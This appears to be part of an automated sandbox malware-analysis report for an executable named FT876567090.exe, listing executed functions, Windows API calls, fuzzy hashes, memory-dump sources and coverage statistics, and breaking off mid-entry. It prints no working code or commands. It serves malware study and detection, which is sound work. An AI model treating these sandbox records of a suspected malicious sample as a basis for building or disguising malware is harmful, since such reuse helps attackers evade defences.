Snapshot File: hcaresult_0_2_70e0000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32cfb0a5cf1b101463388ec6bf3fb8c2e9945d185616da64c3e0439f284f76a7
Instruction ID: 081e2c8e7774a98d600db3da8af0433cc09554faa0377a8cc2f33321b210d7f6
Opcode Fuzzy Hash: 32cfb0a5cf1b101463388ec6bf3fb8c2e9945d185616da64c3e0439f284f76a7
Instruction Fuzzy Hash: D341E5B0E0420ADFCB48CFAAD4815AEFBF6AF89600F14C56AE415B7254E3349A418F95

Function 05534711 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2186142415.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5530000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a8d2eae8ef2b8a8cfd972846cb72cd8d406fa47e3606d1d5b61e2b050e900dc
Instruction ID: 62c9dbded129a8a234a02f650e34ae4cab62608f7a31ed17ff52fe71ebef007d
Opcode Fuzzy Hash: 7a8d2eae8ef2b8a8cfd972846cb72cd8d406fa47e3606d1d5b61e2b050e900dc
Instruction Fuzzy Hash: 7541B6B1D01658CBEB18CFA6C8456EEFBB2BF89310F14C56AC518AB255D7740A46CF90

Function 070E0006 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2188889789.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70e0000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408dc88c0ecba929b6289d68cb74f37791a4caecc2349a9f755752f209500c4c
Instruction ID: 604048e86c1d9f4e482a32fd1cdb81d947291d6ef194b501fca5ef0b055f23b1
Opcode Fuzzy Hash: 408dc88c0ecba929b6289d68cb74f37791a4caecc2349a9f755752f209500c4c
Instruction Fuzzy Hash: B5313C71D057948FE74ACF6B9C0069ABFF7AFCA210F18C0ABC848AB165D7340A458F61

Function 070E0040 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2188889789.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70e0000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04ee74812460e0ba9f14bc65cb7a7477460d20f04f99e1dfb0e65f5303e0932a
Instruction ID: ce731cdf09d47ce592b984d8dab40d72db51ca90d365cf6c005bde612286ae98
Opcode Fuzzy Hash: 04ee74812460e0ba9f14bc65cb7a7477460d20f04f99e1dfb0e65f5303e0932a
Instruction Fuzzy Hash: B111C1B1E006189BEB58CFABD84069EFBF7AFC8200F14C176C51CB6254EB7405568F55

Analysis Process: FT876567090.exePID: 8124, Parent PID: 7408COMMON

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	60.1%
Signature Coverage:	7.7%
Total number of Nodes:	233
Total number of Limit Nodes:	29

Executed Functions

Function 004019F0 Relevance: 98.7, APIs: 9, Strings: 47, Instructions: 747
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
CloseHandle.KERNELBASE(00000000), ref: 00401DC4
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD

Strings

h, xrefs: 00401A6F
W, xrefs: 004020E6
", xrefs: 00401B0F
D, xrefs: 00401DFB
5, xrefs: 00402109
., xrefs: 0040201F
v, xrefs: 0040206A
*, xrefs: 00401A1F
., xrefs: 00401B0A
W, xrefs: 00402033
v, xrefs: 0040212C
0, xrefs: 00401BBD
[, xrefs: 00402047
E, xrefs: 00401E0F
v, xrefs: 00401B5A
V, xrefs: 00401E19
4, xrefs: 00401B64
{, xrefs: 0040205B
x, xrefs: 00401B78
[, xrefs: 00401B37
', xrefs: 00402006
:, xrefs: 00401B28
{, xrefs: 00401E3C
', xrefs: 00401AF6
8, xrefs: 00401BA9
U, xrefs: 004020F5
6, xrefs: 004020C5
%, xrefs: 004020FA
4, xrefs: 00402074
W, xrefs: 00401B14
W, xrefs: 00401B23
o, xrefs: 00401B8D
*, xrefs: 004020E1
o, xrefs: 00402097
{, xrefs: 0040211D
V, xrefs: 00402038
{, xrefs: 00401B4B
x, xrefs: 00401E69
x, xrefs: 0040214A
o, xrefs: 00402159
), xrefs: 0040202E
!, xrefs: 0040201A
!, xrefs: 00401B1E
4, xrefs: 00402136
!, xrefs: 004020CF
x, xrefs: 00402088
v, xrefs: 00401E4B

Memory Dump Source

Source File: 0000000A.00000002.3386681067.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_401000_FT876567090.jbxd

Similarity

API ID: CloseHandleInitialize_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 2812500916-3543104150
Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Function 05B09578 Relevance: 1.9, APIs: 1, Instructions: 359
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.3401521229.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5b00000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79b7727fd6d6cecae4b3dc7cb0ae834eca431b273f88ed24e07edd7b41a5a046
Instruction ID: efc0018620f56e5ccc69e43756580cf64d7c418f6f39067d982805482ce4d6bb
Opcode Fuzzy Hash: 79b7727fd6d6cecae4b3dc7cb0ae834eca431b273f88ed24e07edd7b41a5a046
Instruction Fuzzy Hash: B0F1D774D01218DFDB24DFA9C884B9DBBB2FF88300F1481A9D848AB395DB74A985CF50

Function 02D5A598 Relevance: .9, Instructions: 897COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4ab30380ed01e8e41e25956138cd7603c1b4f23d00a0da2f6a76f48e90ffbde
Instruction ID: 0bc83bd9825976f6da9c7fa4c6de406915bf7cbbe5822cdeff01da6b5fe791e7
Opcode Fuzzy Hash: a4ab30380ed01e8e41e25956138cd7603c1b4f23d00a0da2f6a76f48e90ffbde
Instruction Fuzzy Hash: AC824B71A0022ADFCF15CF68C584AAEBBF2BF88304F158655E8459B3A5D770ED51CB90

Function 02D56EA8 Relevance: .5, Instructions: 524COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 418a527b4c768480f61038739ae8782e11130b12e5a907ef432c09b6c05ade36
Instruction ID: 328eef10e2f11c19f2fd63d53f80054e8003a71740a7ba9b71ccc20221a5a7df
Opcode Fuzzy Hash: 418a527b4c768480f61038739ae8782e11130b12e5a907ef432c09b6c05ade36
Instruction Fuzzy Hash: 04128C70A002198FEB15DF69C854BAEBBF6FF88300F248569E945DB391EB749C41CB90

Function 02D574E0 Relevance: .4, Instructions: 443COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f28f01790c603450e84c00cc8557cf297a177fedc083a3c3bfb85be4d3656a73
Instruction ID: 8458ca333181bd4163966b2756f4c9d34ee49e19321c551234728993f5274277
Opcode Fuzzy Hash: f28f01790c603450e84c00cc8557cf297a177fedc083a3c3bfb85be4d3656a73
Instruction Fuzzy Hash: 37022930A002299FEF15CF69D884AAEFBF2BF88304F258469E855AB365D774DD41CB50

Function 02D5C4E0 Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dbaad61fbe37ef6da37d4372adaedd4b1fb7eafa0e8274e171bd5069ae99e9e
Instruction ID: 92bda8072ede0267c3f8347714689a7db618dc13f95be427b03e4955bef28c56
Opcode Fuzzy Hash: 8dbaad61fbe37ef6da37d4372adaedd4b1fb7eafa0e8274e171bd5069ae99e9e
Instruction Fuzzy Hash: 8FE1F875E10268CFDB14CFA9C894A9DBBF2BF49310F15806AE859AB361DB70AD41CF50

Function 02D5586F Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af13a6a60bd4b5b11a9d1ddbca7c44026aadc54e5ad023f7e7a483dd73f0f679
Instruction ID: 6acdd5573902d2583bb465bf7d939843b7eaf31b757bf7553699aaab9e6e4365
Opcode Fuzzy Hash: af13a6a60bd4b5b11a9d1ddbca7c44026aadc54e5ad023f7e7a483dd73f0f679
Instruction Fuzzy Hash: EC91D474E04218CFEB15DFA9D884A9DBBF2BF89300F2480A9E849AB365DB745D45CF10

Function 02D5D20A Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25ef3923d33ace8d94c46e13146d6fd2495bf6d7d4313da9b925db0a5b280673
Instruction ID: efe9651392921179a03b32febdb863e2e45cc1192c6e0612dd7e74e6e9c0bdc3
Opcode Fuzzy Hash: 25ef3923d33ace8d94c46e13146d6fd2495bf6d7d4313da9b925db0a5b280673
Instruction Fuzzy Hash: 9A81B274E00218CFEB18DFAAD984A9DBBF2BF89300F14C069D859AB365DB749945CF10

Function 02D5D7B8 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ecee78803e57b19a8d3a9e2b917d615f7a6b7650e85404883220d303560ab1b
Instruction ID: 2c91cbb9b4fa771f3375071a30645333b4e691a869558ba6e5bc7a428c9e48e4
Opcode Fuzzy Hash: 5ecee78803e57b19a8d3a9e2b917d615f7a6b7650e85404883220d303560ab1b
Instruction Fuzzy Hash: 1881A274E00218CFEB14DFAAD994A9DBBF2BF89300F148069E849AB365DB749941CF50

Function 02D5D4E0 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 371b5ff6de784665cbdb1408d76df8a582ed3777b9701cd1d4fddf7091f46327
Instruction ID: 9577ffdbe590df9f45cb9b76101cadae4cad3a6da6665bd340f09fbb61dc617c
Opcode Fuzzy Hash: 371b5ff6de784665cbdb1408d76df8a582ed3777b9701cd1d4fddf7091f46327
Instruction Fuzzy Hash: 0081A074E00258CFEB14DFAAD994A9DBBF2FF89300F148069D849AB365DB749946CF10

Function 02D5C980 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a4ca4c1c60770fc7870b35ee118ff8203b309598bb47e3c6ea7468a9a7b8e4
Instruction ID: e0d6c5108869a82f9aaa08cdabc1b2c8da9deab8d63f15e3bf68d80ba1c05175
Opcode Fuzzy Hash: 10a4ca4c1c60770fc7870b35ee118ff8203b309598bb47e3c6ea7468a9a7b8e4
Instruction Fuzzy Hash: 7D81A274E10218CFDB14DFA9D984A9DBBF2BF89304F14806AE849AB365DB745D41CF50

Function 02D5CC58 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 628da9a5bc3396383cb66c500a1606c48d92623f5fdf1dbcfdc3acc7265bdc84
Instruction ID: 93606a5ae9b6f6fc1bb377d78a29ae60e5fe5426e192175c4dfdeef9d7ba64ed
Opcode Fuzzy Hash: 628da9a5bc3396383cb66c500a1606c48d92623f5fdf1dbcfdc3acc7265bdc84
Instruction Fuzzy Hash: B681B274E10218CFEB14DFAAD984A9DBBF2BF89300F14C06AD859AB365DB749941CF50

Function 02D5CF30 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b245340f0b181d3effe80fd3db6084eb352989dab6403fddfa326026ee8d20d
Instruction ID: 6be6199ec7d0bd5ffaac91df24f51ff6245eeb4c27ea17f304fd8054d43b5e51
Opcode Fuzzy Hash: 3b245340f0b181d3effe80fd3db6084eb352989dab6403fddfa326026ee8d20d
Instruction Fuzzy Hash: 8681A174E00218CFEB14DFAAD984A9DBBF2BF89300F248069D859AB365DB749D45CF10

Function 02D5C6A8 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ebeee544f1dfca5d05a24395097bac0b1bb95e5414e6b37be8cf98a0aec6960
Instruction ID: 1603948bf525692e1faf5bfdaab3e14687829fd61be9e8ed62edc708ee50fcc4
Opcode Fuzzy Hash: 3ebeee544f1dfca5d05a24395097bac0b1bb95e5414e6b37be8cf98a0aec6960
Instruction Fuzzy Hash: DA61C474E00658CFDB14DFAAD984A9DBBF2BF89300F24C06AD859AB365DB745941CF10

Function 02D5EED2 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 473e6666b3147910754c90cae18913b645cd4ad29a472a29dffbf4974362fa01
Instruction ID: 146ad1180215d73e1d110e510610c17dd4715397881a39303a7bfdb904f396e7
Opcode Fuzzy Hash: 473e6666b3147910754c90cae18913b645cd4ad29a472a29dffbf4974362fa01
Instruction Fuzzy Hash: E551B774E00218DFEB19DFAAD894A9DFBB2FF89300F249029E815AB365DB715841CF50

Function 02D5EEE0 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc1bd87b6b059bef9ec798c30a8a499354ca5549b6b1da84e2f5567795beb12
Instruction ID: f174a747ce80168ff0b5dfebae7b39ddf055499f0ee18b1820bb46a8710f900b
Opcode Fuzzy Hash: 5bc1bd87b6b059bef9ec798c30a8a499354ca5549b6b1da84e2f5567795beb12
Instruction Fuzzy Hash: 0D51A574E00218DFEB18DFAAD994A9DBBB2FF89300F249029E815AB365DB715D41CF50

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 0000000A.00000002.3386681067.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_401000_FT876567090.jbxd

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Function 06D84708 Relevance: 1.7, APIs: 1, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.3405096570.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d80000_FT876567090.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 81b5a362e3032ff59f93109968b0778605c847d865eef9abb09a69338c2a3b33
Instruction ID: 5540f7d19cb749379453b7a0650e42d78c89f713e6dc0180d91172789a2cb699
Opcode Fuzzy Hash: 81b5a362e3032ff59f93109968b0778605c847d865eef9abb09a69338c2a3b33
Instruction Fuzzy Hash: 22714670A00B069FD7A4EF6AD45879ABBF1FF88204F008A2DD49AD7B40D774E845CB91

Function 06D86CE4 Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06D86E02

Memory Dump Source

Source File: 0000000A.00000002.3405096570.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d80000_FT876567090.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 0641110458a5da8a5e2341cf5c712c724015260e02ad169a0f4c39fde247f526
Instruction ID: 0e639cf5f077013564e0be6abea0bd9eac0b814c41f77418858d3adb288a939c
Opcode Fuzzy Hash: 0641110458a5da8a5e2341cf5c712c724015260e02ad169a0f4c39fde247f526
Instruction Fuzzy Hash: 5951E2B1D00349EFDB15DFA9C894ADEBBB5FF88310F24812AE818AB250D7709845CF91

Function 06D85ABC Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06D86E02

Memory Dump Source

Source File: 0000000A.00000002.3405096570.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d80000_FT876567090.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4d62e0d34779834610627d80d2129aa409994c543958bbf1a1b1d213ccdad6e9
Instruction ID: 577229f78ae9ab59040a7da4e3ad6b5d2dca8dd3d728f0df7ca67a3a66ee0218
Opcode Fuzzy Hash: 4d62e0d34779834610627d80d2129aa409994c543958bbf1a1b1d213ccdad6e9
Instruction Fuzzy Hash: 1F51CFB1D00349DFDB55DFA9C994ADEBBB5FF88310F24812AE819AB210D7749845CF90

Function 06D85C0C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06D89371

Memory Dump Source

Source File: 0000000A.00000002.3405096570.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d80000_FT876567090.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: db501032f376ca68b9bbba0a8fbd8785b54819398c2e952f293f6c05190598a5
Instruction ID: 6359d11466c419eba877b5d1aa6863aa4b6adc3d205b1d20f8cf897ff55f27d0
Opcode Fuzzy Hash: db501032f376ca68b9bbba0a8fbd8785b54819398c2e952f293f6c05190598a5
Instruction Fuzzy Hash: 5A4156B4900309DFDB54DF99C898AAABBF5FF88310F248459E559AB360D374A840CFA0

Function 05B0995F Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 05B09AA1

Memory Dump Source

Source File: 0000000A.00000002.3401521229.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5b00000_FT876567090.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5b256576fc673679267753db0eecdd35a5aa3c2138e4c1ee8c3ddc1aa67bf72e
Instruction ID: 8bb7c50108674545a1d0af84806468263f633a2b82d214f8a552e59fd9b76982
Opcode Fuzzy Hash: 5b256576fc673679267753db0eecdd35a5aa3c2138e4c1ee8c3ddc1aa67bf72e
Instruction Fuzzy Hash: 8A117F74E002188FDB14DBA8D484EBDBBB5FB88315F1491A4E848A7396D730A841CB60

Function 06D83680 Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,06D84724), ref: 06D8495E

Memory Dump Source

Source File: 0000000A.00000002.3405096570.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d80000_FT876567090.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: fe8bc1e4de32dbf8c1de51cc7735b8740ed4d276835cc40a1c96ac0056bc5543
Instruction ID: 7758f50063424069289d6e48f84e7a2b4a59c49f8012526e76d2ab6bdebac0cd
Opcode Fuzzy Hash: fe8bc1e4de32dbf8c1de51cc7735b8740ed4d276835cc40a1c96ac0056bc5543
Instruction Fuzzy Hash: 181102B5C0074ACFDB60DF9AD548A9EFBF4EF88224F10846AD959A7300D374A545CFA1

Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80

SysAllocString.OLEAUT32 ref: 00401898

Memory Dump Source

Source File: 0000000A.00000002.3386681067.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_401000_FT876567090.jbxd

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 0000000A.00000002.3386681067.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_401000_FT876567090.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Function 02D5E55A Relevance: .7, Instructions: 653
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95fcfb63d13cf7ddf73c280f6ad92260239ad82ceb14652742e36e76dc48fc4a
Instruction ID: 957e4633281e680f86a274d16edd9b444040570e635577abacd85f696f2e38b9
Opcode Fuzzy Hash: 95fcfb63d13cf7ddf73c280f6ad92260239ad82ceb14652742e36e76dc48fc4a
Instruction Fuzzy Hash: 9E12A53887924A8FD7802B21E6AE1AABFA4FB4F367700BD44F50FC09559F310599CB61

Function 02D5E568 Relevance: .6, Instructions: 649
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a608935c1ab5bd579306de824511d569115a6d514d36349736b84da3b05a5554
Instruction ID: 64abbb9451a3e00fd40d02da859653ff112fb568debf7fa9e1c173f43724e7be
Opcode Fuzzy Hash: a608935c1ab5bd579306de824511d569115a6d514d36349736b84da3b05a5554
Instruction Fuzzy Hash: CF12953887924A8FD7802B21E6AE1AABFA4FB4F367700BD44F50FC09559F310599CA64

Function 02D51190 Relevance: .5, Instructions: 549
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.3390138355.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d50000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed042c9a8589e0473f83422205757cceeb1e29ca5db171082b8ac5a7b301d31c
Instruction ID: 59441cde5db560a7757652e19a49e60b845435ad2c942cc1404b4215a5a42017
Opcode Fuzzy Hash: ed042c9a8589e0473f83422205757cceeb1e29ca5db171082b8ac5a7b301d31c
Instruction Fuzzy Hash: 73520A34D00219CFCBA4DF64EA94B9DBBB2FB49305F2085A9D609A7390DB391E85CF45

Function 02D511A0 Relevance: .5, Instructions: 543
COMMON

